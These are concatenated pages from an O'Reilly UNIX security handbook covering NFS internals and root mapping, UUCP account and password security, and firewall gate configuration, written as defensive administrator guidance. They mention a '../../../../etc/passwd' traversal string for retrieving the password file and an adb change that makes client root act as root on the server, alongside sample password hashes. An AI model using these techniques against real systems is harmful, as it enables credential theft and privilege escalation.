codified as RFC 1813. A copy of the NFS Version 3 paper can be obtained from<br />

http://www.netapp.com/Docs/TechnicalDocs/nfs_version_3.html. The RFC can be<br />

downloaded from http://ds.internic.net/rfc/rfc1813.txt.<br />

NFS is based on two similar but distinct protocols: MOUNT and NFS. Both make use of a data object<br />

known as a file handle. There is also a distributed protocol for file locking, which is not technically part<br />

of NFS, and which does not have any obvious security ramifications (other than those related to potential<br />

denial of service attacks for its users), so we won't describe the file locking protocol here.<br />

20.1.2 File Handles<br />

Each object on the NFS-mounted filesystem is referenced by a unique object called a file handle. A file<br />

handle is viewed by the client as being opaque - the client cannot interpret the contents. However, to the<br />

server, the contents have considerable meaning. The file handles uniquely identify every file and<br />

directory on the server computer.<br />

Under <strong>UNIX</strong>, a file handle consists of at least three important elements: the filesystem identifier, the file<br />

identifier, and a generation count. The file identifier can be something as simple as an inode number to<br />

refer to a particular item on a partition. The filesystem identifier refers to the partition containing the file<br />

(inode numbers are unique per partition, but not per system). The file handle doesn't include a pathname;<br />

a pathname is not necessary and is in fact subject to change while a file is being accessed.<br />

The generation count is a number that is incremented each time a file is unlinked and recreated. The<br />

generation count ensures that when a client references a file on the server, that file is in fact the same file<br />

that the server thinks it is. Without a generation count, two clients accessing the same file on the server<br />

could produce erroneous results if one client deleted the file and created a new file with the same inode<br />

number. The generation count prevents such situations from occurring: when the file is recreated, the<br />

generation number is incremented, and the second client gets an error message when it attempts to access<br />

the older, now nonexistent, file.<br />

Which Is Better: Stale Handles or Stale Love?<br />

To better understand the role of the generation count, imagine a situation in which you are writing a<br />

steamy love letter to a colleague with whom you are having a clandestine affair. You start by opening a<br />

new editor file on your workstation. Unbeknownst to you, your editor puts the file in the /tmp directory,<br />

which happens to be on the NFS server. The server allocates an inode from the free list on that partition,<br />

constructs a file handle for the new file, and sends the file handle to your workstation (the client). You<br />

begin editing the file. "My darling chickadee, I remember last Thursday in your office," you start to<br />

write, only to be interrupted by a long phone call.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (3 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

You aren't aware of it, but as you are talking on the phone, there is a power flicker in the main computer<br />

room, and the server crashes and reboots. As part of the reboot, the temporary file for your mailer is<br />

deleted along with everything else in the /tmp directory, and its inode is added back to the free list on the<br />

server. While you are still talking on the phone, your manager starts to compose a letter to the president<br />

of the company, recommending a raise and promotion for you. He also opens a file in the /tmp directory,<br />

and his diskless workstation is allocated a file handle for the same inode that you were using (it is free<br />

now, after all)!<br />

You finally finish your call and return to your letter. Of course, you notice nothing out of the ordinary<br />

because of the stateless nature of NFS. You put the finishing touches on your letter, "... and I can't wait<br />

until this weekend; my wife suspects nothing!" and save it. Your manager finishes his letter at the same<br />

moment: "... as a reward for his hard work and serious attitude, I recommend a 50% raise." Your<br />

manager and you hit the "send" key simultaneously.<br />

Without a generation count, the results might be less than amusing. The object of your affection could<br />

get a letter about you deserving a raise. Or, your manager's boss could get a letter concerning a midday<br />

dalliance on the desktop. Or, both recipients might get a mixture of the two versions, with each version<br />

containing one file record from one file and one from another. The problem is that the system can't<br />

distinguish the two files because the file handles are the same.<br />

This sort of thing occasionally happened before Sun got the generation-count code working properly and<br />

consistently. With the generation-count software working as it should, you would instead get an error<br />

message stating "Stale NFS File Handle" when you try to access the (now deleted) file. That's because<br />

the server increments the generation count value in the inode when the inode is returned to the free list.<br />

Later, whenever the server receives a request from a client that has a valid file handle except for the<br />

generation count, the server rejects the operation and returns an error.<br />

NOTE: Some NFS servers ignore the generation count in the file handle. These versions of<br />

NFS are considerably less secure, as they enable an attacker to easily create valid file<br />

handles for directories on the server.<br />

20.1.3 MOUNT Protocol<br />

The MOUNT protocol is used for the initial negotiation between the NFS client and the NFS server.<br />

Using MOUNT, a client can determine which filesystems are available for mounting and can obtain a<br />

token (the file handle) which is used to access the root directory of a particular filesystem. After that file<br />

handle is returned, it can thereafter be used to retrieve file handles for other directories and files on the<br />

server.<br />

Another benefit of the MOUNT protocol is that you can export only a portion of a local partition to a<br />

remote client. By specifying that the root is a directory on the partition, the MOUNT service will return<br />

its file handle to the client. To the client, this file handle behaves exactly as one for the root of a partition:<br />

reads, writes, and directory lookups all behave the same way.<br />

MOUNT is an RPC service. The service is provided by the mountd or rpc.mountd daemon, which is<br />

started automatically at boot. (On Solaris 2.x systems, for example, mountd is located in<br />

/usr/lib/nfs/mountd, and is started by the startup script /etc/rc3.d/S15nfs.server.) MOUNT is often given<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (4 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

the RPC program number 100,005. The standard mountd can respond to seven different requests:<br />

NULL Does nothing.<br />

MNT Returns a file handle for a filesystem. Advises the mount daemon that a client has mounted<br />

the filesystem.<br />

DUMP Returns the list of mounted filesystems.<br />

UMNT Removes the mount entry for this client for a particular filesystem.<br />

UMNTALL Removes all mount entries for this client.<br />

EXPORT Returns the server's export list to the client.<br />

Although the MOUNT protocol provides useful information within an organization, the information that<br />

it provides could be used by those outside an organization to launch an attack. For this reason, you<br />

should prevent people outside your organization from accessing your computer's mount daemon. Two<br />

ways of providing this protection are via the portmapper wrapper, and via an organizational firewall. See<br />

Chapter 22, Wrappers and Proxies, and Chapter 21, Firewalls, for further information.<br />

The MOUNT protocol is based on Sun Microsystem's Remote Procedure Call (RPC) and External Data<br />

Representation (XDR) protocols. For a complete description of the MOUNT protocol see RFC 1094.<br />

20.1.4 NFS Protocol<br />

The NFS protocol takes over where the MOUNT protocol leaves off. With the NFS protocol, a client can<br />

list the contents of an exported filesystem's directories; obtain file handles for other directories and files;<br />

and even create, read, or modify files (as permitted by <strong>UNIX</strong> permissions.)<br />

Here is a list of the RPC functions that perform operations on directories:<br />

CREATE Creates (or truncates) a file in the directory<br />

LINK Creates a hard link<br />

LOOKUP Looks up a file in the directory<br />

MKDIR Makes a directory<br />

READADDR Reads the contents of a directory<br />

REMOVE Removes a file in the directory<br />

RENAME Renames a file in the directory<br />

RMDIR Removes a directory<br />

SYMLINK Creates a symbolic link<br />

These RPC functions can be used with files:<br />

GETATTR Gets a file's attributes (owner, length, etc.)<br />

SETATTR Sets some of a file's attributes<br />

READLINK Reads a symbolic link's path<br />

READ Reads from a file.<br />

WRITE Writes to a file.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (5 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

NFS version 3 adds a number of additional RPC functions. With the exception of MKNOD3, these new<br />

functions simply allow improved performance:<br />

ACCESS Determines if a user has the permission to access a particular file or directory.<br />

FSINFO Returns static information about a filesystem.<br />

FSSTAT Returns dynamic information about a filesystem.<br />

MKNOD Creates a device or special file on the remote filesystem.<br />

READDIRPLUS Reads a directory and returns the file attributes for each entry in the directory.<br />

PATHCONF Returns the attributes of a file specified by pathname.<br />

COMMIT Commits the NFS write cache to disk.<br />

All communication between the NFS client and the NFS server is based upon Sun's RPC system, which<br />

lets programs running on one computer call subroutines that are executed on another. RPC uses Sun's<br />

XDR system to allow the exchange of information between different kinds of computers. For speed and<br />

simplicity, Sun built NFS upon the <strong>Internet</strong> User Datagram Protocol (UDP); however, NFS version 3<br />

allows the use of TCP, which actually improves performance over low-bandwidth, high-latency links<br />

such as modem-based PPP connections.<br />

20.1.4.1 How NFS creates a reliable filesystem from a best-effort protocol<br />

UDP is fast but only best-effort: "Best effort" means that the protocol does not guarantee that UDP<br />

packets transmitted will ever be delivered, or that they will be delivered in order. NFS works around this<br />

problem by requiring the NFS server to acknowledge every RPC command with a result code that<br />

indicates whether the command was successfully completed or not. If the NFS client does not get an<br />

acknowledgment within a certain amount of time, it retransmits the original command.<br />

If the NFS client does not receive an acknowledgment, then UDP lost either the original RPC command<br />

or the RPC acknowledgment. If the original RPC command was lost, there is no problem - the server sees<br />

it for the first time when it is retransmitted. But if the acknowledgment was lost, the server will actually<br />

get the same NFS command twice.<br />

For most NFS commands, this duplication of requests presents no problem. With READ, for example,<br />

the same block of data can be read once or a dozen times, without consequence. Even with the WRITE<br />

command, the same block of data can be written twice to the same point in the file, without<br />

consequence.[3]<br />

[3] This is precisely the reason that NFS does not have an atomic command for appending<br />

information to the end of a file.<br />

Other commands, however, cannot be executed twice in a row. MKDIR, for example, will fail the second<br />

time that it is executed because the requested directory will already exist. For commands that cannot be<br />

repeated, some NFS servers maintain a cache of the last few commands that were executed. When the<br />

server receives a MKDIR request, it first checks the cache to see if it has already received the MKDIR<br />

request. If so, the server merely retransmits the acknowledgment (which must have been lost).<br />

20.1.4.2 Hard, soft, and spongy mounts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (6 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

If the NFS client still receives no acknowledgment, it will retransmit the request again and again, each<br />

time doubling the time that it waits between retries. If the network filesystem was mounted with the soft<br />

option, the request will eventually time out. If the network filesystem is mounted with the hard option,<br />

the client continues sending the request until the client is rebooted or gets an acknowledgment. BSDI and<br />

OSF/1 also have a spongy option that is similar to hard, except that the stat, lookup, fsstat, readlink, and<br />

readdir operations behave like a soft MOUNT.<br />

Figure 20.1: NFS protocol stack<br />

NFS uses the mount command to specify if a filesystem is mounted with the hard or soft option. To<br />

mount a filesystem soft, specify the soft option. For example:<br />

/etc/mount -o soft zeus:/big /zbig<br />

This command mounts the directory /big stored on the server called zeus locally in the directory /zbig.<br />

The option -o soft tells the mount program that you wish the filesystem mounted soft.<br />

To mount a filesystem hard, do not specify the soft option:<br />

/etc/mount zeus:/big /zbig<br />

Deciding whether to mount a filesystem hard or soft can be difficult, because there are advantages and<br />

disadvantages to each option. Diskless workstations often hard-mount the directories that they use to<br />

keep system programs; if a server crashes, the workstations wait until the server is rebooted, then<br />

continue file access with no problem. Filesystems containing home directories are usually hard mounted,<br />

so that all disk writes to those filesystems will be correctly performed.<br />

On the other hand, if you mount many filesystems with the hard option, you will discover that your<br />

workstation may stop working every time any server crashes until it reboots. If there are many libraries<br />

and archives that you keep mounted on your system, but which are not critical, you may wish to mount<br />

them soft. You may also wish to specify the intr option, which is like the hard option except that the user<br />

can interrupt it by typing the kill character (usually control-C).<br />

As a general rule of thumb, read-only filesystems can be mounted soft without any chance of accidental<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (7 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

loss of data. But you will have problems if you try to run programs off partitions that are soft-mounted,<br />

because when you get errors, the program that you are running will crash.<br />

An alternative to using soft mounts is to mount everything hard (or spongy, when available), but to avoid<br />

mounting your nonessential NFS partitions directly in the root directory. This practice will prevent the<br />

<strong>UNIX</strong> getpwd() function from hanging when a server is down.[4]<br />

[4] Hal Stern, in Managing NFS and NIS, says that any filesystem that is read-write or on<br />

which you are mounting executables should be mounted hard to avoid corruption. His<br />

analogy with a dodgy NFS server is that hard mount behaves like a slow drive, while soft<br />

mount behaves like a broken drive!<br />

20.1.4.3 Connectionless and stateless<br />

As we've mentioned, NFS servers are stateless by design. Stateless means that all of the information that<br />

the client needs to mount a remote filesystem is kept on the client, instead of having additional<br />

information with the mount stored on the server. After a file handle is issued for a file, that file handle<br />

will remain good even if the server is shut down and rebooted, as long as the file continues to exist and as<br />

long as no major changes are made to the configuration of the server that would change the values (e.g., a<br />

file system rebuild or restore from tape).<br />

Early NFS servers were also connectionless. Connectionless means that the server program does not keep<br />

track of every client that has remotely mounted the filesystem.[5] When offering NFS over a TCP<br />

connection, however, NFS is not connectionless: there is one TCP connection for each mounted<br />

filesystem.<br />

[5] An NFS server computer does keep track of clients that mount their filesystems<br />

remotely. The /usr/etc/rpc.mountd program maintains this database; however, a computer<br />

that is not in this database can still access the server's filesystem even if it is not registered in<br />

the rpc.mountd database.<br />

The advantage of a stateless, connectionless system is that such systems are easier to write and debug.<br />

The programmer does not need to write any code for reestablishing connections after the network server<br />

crashes and restarts, because there is no connection that must be reestablished. If a client should crash (or<br />

if the network should become disconnected), valuable resources are not tied up on the server maintaining<br />

a connection and state for that client.<br />

A second advantage of this approach is that it scales. That is, a connectionless, stateless NFS server<br />

works equally well if ten clients are using a filesystem or if ten thousand are using it. Although system<br />

performance suffers under extremely heavy use, every file request made by a client using NFS will<br />

eventually be satisfied, and there is absolutely no performance penalty if a client mounts a filesystem but<br />

never uses it.<br />

20.1.4.4 NFS and root<br />

Because the superuser can do so much damage on the typical <strong>UNIX</strong> system, NFS takes special<br />

precautions in the way that it handles the superuser running on client computers.<br />

Instead of giving the client superuser unlimited privileges on the NFS server, NFS gives the superuser on<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (8 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

the clients virtually no privileges: the superuser gets mapped to the UID of the nobody user - usually a<br />

UID of 32767 or 60001 (although occasionally -1 or -2 on pre-POSIX systems).[6] Some versions of<br />

NFS allow you to specify the UID to which to map root's accesses, with the UID of the nobody user as<br />

the default.<br />

[6] The <strong>UNIX</strong> kernel maps accesses from client superusers to the kernel variable nobody,<br />

which is set to different values on different systems. Historically, the value of nobody was<br />

-1, although Solaris defines nobody to be 60001. You can change this value to 0 through the<br />

use of adb, making all superuser requests automatically be treated as superuser on the NFS<br />

server. In the immortal words of Ian D. Horswill, "The Sun kernel has a user-patchable<br />

cosmology. It contains a polytheism bit called `nobody.'...The default corresponds to a<br />

basically Greek pantheon in which there are many Gods and they're all trying to screw each<br />

other (both literally and figuratively in the Greek case). However, by using adb to set the<br />

kernel variable nobody to 0 in the divine boot image, you can move to a Ba'hai cosmology<br />

in which all Gods are really manifestations of the One Root God, Zero, thus inventing<br />

monotheism." (The <strong>UNIX</strong>-Haters Handbook, Garfinkel et al. IDG Books, 1994. p. 291)<br />

Thus, superusers on NFS client machines actually have fewer privileges (with respect to the NFS server)<br />

than ordinary users. However, this lack of privilege isn't usually much of a problem for would-be<br />

attackers who have root access, because the superuser can simply su to a different UID such as bin or<br />

sys. On the other hand, treating the superuser in this way can protect other files on the NFS server.<br />

NFS does no remapping of any other UID, nor does it do any remapping of any GID values. Thus, if a<br />

server exports any file or directory with access permissions for some user or group, the superuser on a<br />

client machine can take on an identity to access that information. This rule implies that the exported file<br />

can be read or copied by someone remote, or worse, modified without authorization.<br />

20.1.5 NFS Version 3<br />

During the ten years of the life of NFS Version 2, a number of problems were discovered with it. These<br />

problems included:<br />

●<br />

●<br />

●<br />

●<br />

NFS was originally based on AUTH_<strong>UNIX</strong> RPC security. As such, it provided almost no<br />

protection against spoofing. AUTH_<strong>UNIX</strong> simply used the stated UID and GID of the client user<br />

to determine access.<br />

The packets transmitted by NFS were not encrypted, and were thus open to eavesdropping,<br />

alteration, or forging on a network.<br />

NFS had no provisions for files larger than 4GB. This was not a problem in 1985, but many <strong>UNIX</strong><br />

users now have bigger disks and bigger files.<br />

NFS suffered serious performance problems on high-speed networks because of the maximum 8K<br />

data-size limitation on READ and WRITE procedures, and because of the need to separately<br />

request the file attributes on each file when a directory was read.<br />

NFS 3 is the first major revision to NFS since the protocol was commercially released. As such, NFS 3<br />

was designed to correct many of the problems that had been experienced with NFS. But NFS 3 is not a<br />

total rewrite. According to Pawlowski et al., there were three guiding principles in designing NFS 3:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (9 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

1.<br />

2.<br />

3.<br />

Keep it simple.<br />

Get it done in a year.<br />

Avoid anything controversial.<br />

Thus, while NFS 3 allows for improved performance and access to files larger than 4GB, it does not<br />

make any fundamental changes to the overall NFS architecture.<br />

As a result of the design criteria, there are relatively few changes between the NFS 2 and 3 protocols:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

File-handle size has been increased from a fixed-length 32-byte block of data to a variable-length<br />

array with a maximum length of 64 bytes.<br />

The maximum size of data that can be transferred using READ and WRITE procedures is now<br />

determined dynamically by the values returned by the FSINFO function. The maximum lengths<br />

for filenames and pathnames are now similarly specified.<br />

File lengths and offsets have been extended from four bytes to eight bytes.[7]<br />

[7] Future versions of NFS - or any other filesystem - will not likely need to use more<br />

than eight bytes to represent the size of a file: eight bytes can represent more than 1.7<br />

x 1013MB of storage.<br />

RPC errors can now return data (such as file attributes) in addition to return codes.<br />

Additional file types are now supported for character- and block-device files, sockets, and FIFOS.<br />

An ACCESS procedure has been added to allow an NFS client to explicitly check to see if a<br />

particular user can or cannot access a file.<br />

Because RPC allows a server to respond to more than one version of a protocol at the same time, NFS 3<br />

servers will be able to support the NFS 2 and 3 protocols simultaneously, so that they can serve older<br />

NFS 2 clients while allowing easy upgradability to NFS 3. Likewise, most NFS 3 clients will continue to<br />

support the NFS 2 protocol as well, so that they can speak with old servers and new ones.<br />

This need for backward compatibility effectively prevented the NFS 3 designers from adding new<br />

security features to the protocols. If NFS 3 had more security features, an attacker could avoid them by<br />

resorting to NFS 2. On the other hand, by changing a site from unsecure RPC to secure RPC, a site can<br />

achieve secure NFS for all of its NFS clients and servers, whether they are running NFS 2 or NFS 3.<br />

NOTE: If and when your system supports NFS over TCP links, you should configure it to<br />

use TCP and not UDP unless there are significant performance reasons for not doing so.<br />

TCP-based service is more immune to denial of service problems, spoofed requests, and<br />

several other potential problems inherent in the current use of UDP packets.<br />

19.7 Other Network<br />

Authentication Systems<br />

20.2 Server-Side NFS<br />

<strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (10 of 11) [2002-04-12 10:45:38]


[Chapter 20] NFS<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_01.htm (11 of 11) [2002-04-12 10:45:38]


[Chapter 15] 15.3 UUCP and <strong>Sec</strong>urity<br />

Chapter 15<br />

UUCP<br />

15.3 UUCP and <strong>Sec</strong>urity<br />

Any system that allows files to be copied from computer to computer and allows commands to be remotely executed raises a<br />

number of security concerns. What mechanisms exist to prevent unauthorized use? What prevents an attacker from using the<br />

system to gain unauthorized entry? What prevents an attacker from reverse engineering the system to capture confidential<br />

information? Fortunately, UUCP has many security measures built into it to minimize the dangers posed by its capabilities. For<br />

example:<br />

●<br />

●<br />

●<br />

The uucico program must log into your system to transfer files or run commands. By assigning a password to the uucp<br />

account, you can prevent unauthorized users from logging in.<br />

The UUCP programs run SUID uucp, not SUID root. Other than being able to read the spooled UUCP files, the uucp<br />

user doesn't have any special privileges. It can read only files that are owned by uucp or that are readable by everybody<br />

on the system; likewise, it can create files only in directories that are owned by uucp or in directories that are world<br />

writable.<br />

The UUCP login does not receive a normal shell, but instead invokes another copy of uucico. The only functions that can<br />

be performed by this copy of uucico are those specified by the system administrator.<br />

As system administrator, you have a few more tools for controlling the level of security:<br />

●<br />

●<br />

●<br />

You can create additional /etc/passwd entries for each system that calls your machine, allowing you to grant different<br />

privileges and access to different remote computers.<br />

You can configure UUCP so remote systems can retrieve files only from particular directories. Alternatively, you can<br />

turn off remote file retrieval altogether.<br />

You can require callback for certain systems, so you can be reasonably sure that the UUCP system you are<br />

communicating with is not an impostor.<br />

But even with these protective mechanisms, UUCP can compromise system security if it is not properly installed. And once<br />

one system is compromised, it can be used to compromise others, because UUCP passwords are stored unencrypted.<br />

NOTE: If you run an NFS server on the same computer that you use for UUCP, the NFS server must not export<br />

the UUCP configuration, program, or data directories. This is because the UUCP files are owned by the uucp user,<br />

not by the user root. In standard NFS, only files owned by root are protected. Thus, an attacker could use NFS to<br />

modify the UUCP files on your system, and use that modification as a means for gaining further access.<br />

15.3.1 Assigning Additional UUCP Logins<br />

Most Berkeley <strong>UNIX</strong> systems come with two UUCP logins. The first is used by computers that call and exchange information<br />

using uucico:<br />

uucp:Ab1zDIdS2/JCQ:4:4:Mr. UUCP:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

The second UUCP login, usually called uucpa or nuucp, has a regular shell as its login shell. It is used for administration. (The<br />

"a" stands for "administrator.")<br />

uucp:Ab1zDIdS2/JCQ:4:4:Mr. UUCP:/usr/lib/uucp/uucico<br />

uucpa:3jd912JFK31fa:4:4:UUCP Admin:/usr/lib/uucp/:/bin/csh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_03.htm (1 of 3) [2002-04-12 10:45:38]


[Chapter 15] 15.3 UUCP and <strong>Sec</strong>urity<br />

(System V systems usually use the account name uucp as the administrative login and nuucp as the uucico login.)<br />

These two logins are all that you need to use UUCP. Every machine that calls you uses the same uucp login. In most cases,<br />

every machine will be granted the same type of access on your machine.<br />

Alternatively, you may wish to assign a different login to each machine that calls you. This lets you grant different classes of<br />

access to each machine, and gives you a lot more control over each one.<br />

For example, if you are called by the machines garp, idr, and prose, you might want to have a separate login for each of these<br />

machines[6]:<br />

[6] Many system administrators capitalize the "U" at the beginning of dedicated UUCP login names. This notation<br />

helps to distinguish the login names from usernames that might begin with a lower-case "u" (e.g., ursula and<br />

ulrich). Furthermore, some software uses this convention to trigger special behavior - such as mgetty in Linux,<br />

which will switch to uucico instead of login. Reliance on such naming is a questionable design from a security<br />

point of view, but we do note the convention.<br />

uucp:asXN3sQefHsh:4:4:Mr. UUCP:/usr/spool/uucppublic/:/usr/lib/uucp/uucico<br />

Ugarp:ddGw1opxMz1MQ:4:4:UUCP Login for garp:/usr/spool/uucppublic/<br />

:/usr/lib/uucp/uucico<br />

Uprose:777uf2KOKdbkY:4:4:UUCP Login for prose:/usr/spool/uucppublic/<br />

:/usr/lib/uucp/uucico<br />

Uidr:asv.nbgMNy/cA:4:4:UUCP Login for idr:/usr/spool/uucppublic/<br />

:/usr/lib/uucp/uucico<br />

The only differences between these logins are their usernames, passwords, and full names; the UIDS, home directories, and<br />

shells all remain the same. Having separate UUCP logins lets you use the last and finger commands to monitor who is calling<br />

you. Separate logins also make the task of tracing security leaks easier: for example, one machine dialing in with one username<br />

and password, but pretending to be another. Furthermore, if you decide that you no longer want a UUCP link with a particular<br />

system, you can shut off access to that site by changing the password of one of the UUCP logins without affecting other<br />

systems.<br />

If you have many UUCP connections within your organization and only a few to the outside, you may wish to compromise by<br />

having one UUCP login for your local connections and separate UUCP logins for all of the systems that dial in from outside.<br />

15.3.2 Establishing UUCP Passwords<br />

Many <strong>UNIX</strong> systems come without passwords for their UUCP accounts; be sure to establish passwords for these accounts<br />

immediately, whether or not you intend to use UUCP.<br />

Because the shell for UUCP accounts is uucico (rather than sh, ksh, or csh), you can't set the passwords for these accounts by<br />

su-ing to them and then using the passwd command. If you do, you'll get a copy of uucico as your shell, and you won't be able<br />

to type sensible commands. Instead, to set the password for the UUCP account, you must become the superuser and use the<br />

passwd command with its optional argument - the name of the account whose password you are changing. For example:<br />

% /bin/su<br />

password: bigtime! Superuser password<br />

# passwd uucp<br />

New password: longcat! New password for the uucp account<br />

Re-enter new password: longcat!<br />

15.3.3 <strong>Sec</strong>urity of L.sys and Systems Files<br />

Because it logs in to remote systems, uucico has to keep track of the names, telephone numbers, account names, and passwords<br />

it uses to log into these machines. This information is kept in a special file called /usr/lib/uucp/L.sys (in Version 2) or<br />

/usr/lib/uucp/Systems (in BNU).<br />

The information in the L.sys or Systems file can easily be misused. For example, somebody who has access to this file can<br />

program his or her computer to log into one of the machines that you exchange mail with, pretending to be your machine, and<br />

in this way get all of your electronic mail!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_03.htm (2 of 3) [2002-04-12 10:45:38]


[Chapter 15] 15.3 UUCP and <strong>Sec</strong>urity<br />

To protect the L.sys or Systems file, make sure that the file is owned by the uucp user and is mode 400 or 600 - that is,<br />

unreadable to anybody but UUCP.<br />

You should check to make sure that there is no way to read or copy your L.sys or Systems file by using the uucp program. You<br />

should also make sure that the uucp program does not allow people on remote machines to retrieve your /etc/passwd file when<br />

they specify pathnames such as "../../../../etc/passwd."<br />

NOTE: When debugging a UUCP connection to a remote site, you may wish to run the uucico command in debug<br />

mode. When you do so, the command prints a running account of the data exchanged with the remote machine. On<br />

most systems, if you do this as root (or as a user with read permission on the L.sys or Systems file, e.g., a user in<br />

group uucp), then the debug text will include the telephone number, account name, and possibly the password(s)<br />

of the remote site. Thus, run in debug mode as a non-privileged user, or in a secured location to prevent someone<br />

from snooping.<br />

15.2 Versions of UUCP 15.4 <strong>Sec</strong>urity in Version 2<br />

UUCP<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_03.htm (3 of 3) [2002-04-12 10:45:38]


[Chapter 21] 21.4 Setting Up the Gate<br />

Chapter 21<br />

Firewalls<br />

21.4 Setting Up the Gate<br />

The gate machine is the other half of the firewall. The choke forces all communication between the<br />

inside network and the outside network to take place through the gate; the gate enforces security,<br />

authenticating users, sanitizing data (if necessary), and passing it along.<br />

The gate should have a very stripped-down version of some operating system. It should have no<br />

compiler, for example, to prevent attackers from compiling programs on it. It should have no regular user<br />

accounts, to limit the places where an attacker can enter.<br />

You concentrate a great deal of your security effort on setting up and maintaining the gate. Usually, the<br />

gate will act as your mail server, your Usenet server (if you support news), and your anonymous FTP<br />

repository (if you maintain one).[9] It should not be your file server. We'll discuss how you configure<br />

each of these services, and then how to protect the gate.<br />

[9] We advise against putting your anonymous FTP depository on your firewall. However, if<br />

your resources are really so limited that you can't obtain another machine, and if you<br />

absolutely must have FTP enabled, this is the way to do it.<br />

For these examples, we use a hypothetical domain called company.com. We've named the gate machine<br />

keeper.company.com and an internal user machine office.company.com.<br />

21.4.1 Name Service<br />

Either the choke or the gate must provide <strong>Internet</strong> Domain Name Service (DNS) to the outside network<br />

for the company.com domain. Usually, you will do this by running the Berkeley name server (BIND) on<br />

one of these machines.[10]<br />

[10] There are many nuances to configuring your DNS service in a firewall situation. We<br />

recommend you see DNS and BIND by Albitz and Liu, and Building <strong>Internet</strong> Firewalls by<br />

Chapman and Zwicky, both published by <strong>O'Reilly</strong> & Associates.<br />

Occasionally, the names of computers on your internal network will be sent outside; your name server<br />

should be set up so that when people on the outside try to send mail back to the internal computers, the<br />

mail is sent to the gate instead. The simplest way to set up this configuration is with a name server MX<br />

record. A MX record causes electronic mail destined for one machine to actually be sent to another.<br />

Configure your name server on the gate so that there is a MX record with a wildcard DNS record that<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (1 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.4 Setting Up the Gate<br />

specifies all of the hosts within your domain.<br />

For example, this rule specifies that any mail for inside the company.com domain is to go to keeper:<br />

*.company.com. IN MX 20 KEEPER.COMPANY.COM<br />

In this manner, people on the outside network will be able to reply to any electronic mail that "escapes"<br />

with an internal name. (Be advised that a specific A record will outweigh a wildcard MX record. Thus, if<br />

you have an A record for an internal machine, you will also need to have an MX record for that machine<br />

so that the computer's email is properly sent to your mail server.)<br />

21.4.2 Electronic Mail<br />

Configure the gate so all outgoing mail appears to come from the gate machine; that is:<br />

●<br />

●<br />

●<br />

●<br />

All mail messages sent from the inside network must have the To:, From:, Cc:, Sender:, Reply-To:<br />

and Errors-To: fields of their headers rewritten so an address in the form<br />

user@office.company.com is translated to the form user@company.com.<br />

Because all mail from the outside is sent through the gate, the gate must have a full set of mail<br />

aliases to allow mail to be redirected to the appropriate internal site and user.<br />

Mail on the internal machines, like office, must have their mailers configured so that all mail not<br />

destined for an internal machine (i.e., anything not to a company.com machine) is sent to the gate,<br />

where the message's headers will be rewritten and then forwarded through the choke to the<br />

external network.<br />

All UUCP mail must be run from the gate machine. All outgoing UUCP messages must have their<br />

return paths rewritten from company!office!user to company!user.<br />

There are many advantages to configuring your mail system with a central "post office":<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Only one machine needs to have a complex mailer configuration.<br />

Only one machine needs to handle automatic UUCP path routing.<br />

Only one machine needs to have a complete set of user aliases visible to the outside.<br />

If a user changes the name of his or her computer, that change needs to be made only on the gate<br />

machine. Nobody in the outside world, including electronic correspondents, needs to update his or<br />

her information; the change can easily be installed by the administrator at the gate machine.<br />

You can more easily use complete aliases on your user accounts: all mail off- site can have<br />

firstname_lastname in its mail header.<br />

If a user leaves the organization and needs to have his or her mail forwarded, mail forwarding can<br />

be done on the gate machine. This eliminates the need to leave old accounts in place simply to<br />

allow a .forward file to point to the person's new address.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (2 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.4 Setting Up the Gate<br />

21.4.3 Netnews<br />

Configure news so the gate machine is the main news machine in the organization:<br />

●<br />

●<br />

●<br />

All outgoing articles must have the Path: and From: lines set to show only the gate machine. This<br />

setup is not difficult to do if the news is present only on the gate machine - standard news software<br />

provides defines in the configuration file to build the headers this way.<br />

Internally, news can be read with NNTP and rrn, trn, nn, xrn, etc.<br />

Alternatively, the news spool can be directory (usually /usr/spool/news) exported read-only by the<br />

gate machine to the internal machines. Posting internally would still be via NNTP and inews.<br />

Again, there are advantages to this configuration beyond the security considerations. One benefit is that<br />

news is maintained on a central machine, thus simplifying maintenance and storage considerations.<br />

Furthermore, you can regulate local-only groups because the gate machine can be set to prevent local<br />

